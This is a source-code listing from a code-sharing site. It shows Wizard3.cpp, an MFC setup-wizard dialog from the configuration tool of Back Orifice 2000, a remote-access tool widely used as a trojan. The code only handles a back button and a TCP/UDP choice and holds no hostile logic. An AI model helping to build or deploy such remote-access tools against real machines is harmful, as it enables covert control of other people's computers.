Wizard3.cpp
上传用户:jinandeyu
上传日期:2007-01-05
资源大小:620k
文件大小:2k
源码类别:

远程控制编程

开发平台:

WINDOWS

  1. /*  Back Orifice 2000 - Remote Administration Suite
  2.     Copyright (C) 1999, Cult Of The Dead Cow
  3.     This program is free software; you can redistribute it and/or modify
  4.     it under the terms of the GNU General Public License as published by
  5.     the Free Software Foundation; either version 2 of the License, or
  6.     (at your option) any later version.
  7.     This program is distributed in the hope that it will be useful,
  8.     but WITHOUT ANY WARRANTY; without even the implied warranty of
  9.     MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  10.     GNU General Public License for more details.
  11.     You should have received a copy of the GNU General Public License
  12.     along with this program; if not, write to the Free Software
  13.     Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
  14. The author of this program may be contacted at dildog@l0pht.com. */
  15. // Wizard3.cpp : implementation file
  16. //
  17. #include "stdafx.h"
  18. #include "bo2kcfg.h"
  19. #include "Wizard3.h"
  20. #ifdef _DEBUG
  21. #define new DEBUG_NEW
  22. #undef THIS_FILE
  23. static char THIS_FILE[] = __FILE__;
  24. #endif
  25. /////////////////////////////////////////////////////////////////////////////
  26. // CWizard3 dialog
  27. CWizard3::CWizard3(CWnd* pParent /*=NULL*/)
  28. : CDialog(CWizard3::IDD, pParent)
  29. {
  30. //{{AFX_DATA_INIT(CWizard3)
  31. //}}AFX_DATA_INIT
  32. }
  33. void CWizard3::DoDataExchange(CDataExchange* pDX)
  34. {
  35. CDialog::DoDataExchange(pDX);
  36. //{{AFX_DATA_MAP(CWizard3)
  37. //}}AFX_DATA_MAP
  38. }
  39. BEGIN_MESSAGE_MAP(CWizard3, CDialog)
  40. //{{AFX_MSG_MAP(CWizard3)
  41. ON_BN_CLICKED(IDBACK, OnBack)
  42. ON_WM_DESTROY()
  43. //}}AFX_MSG_MAP
  44. END_MESSAGE_MAP()
  45. /////////////////////////////////////////////////////////////////////////////
  46. // CWizard3 message handlers
  47. void CWizard3::OnBack() 
  48. {
  49. EndDialog(IDBACK);
  50. }
  51. BOOL CWizard3::OnInitDialog() 
  52. {
  53. CDialog::OnInitDialog();
  54. if(m_nNetType==0) {
  55. CheckRadioButton(IDC_TCPIO,IDC_UDPIO,IDC_TCPIO);
  56. } else {
  57. CheckRadioButton(IDC_TCPIO,IDC_UDPIO,IDC_UDPIO);
  58. }
  59. return TRUE;  // return TRUE unless you set the focus to a control
  60.               // EXCEPTION: OCX Property Pages should return FALSE
  61. }
  62. void CWizard3::OnDestroy() 
  63. {
  64. m_nNetType=IsDlgButtonChecked(IDC_TCPIO)?0:1;
  65. CDialog::OnDestroy();
  66. }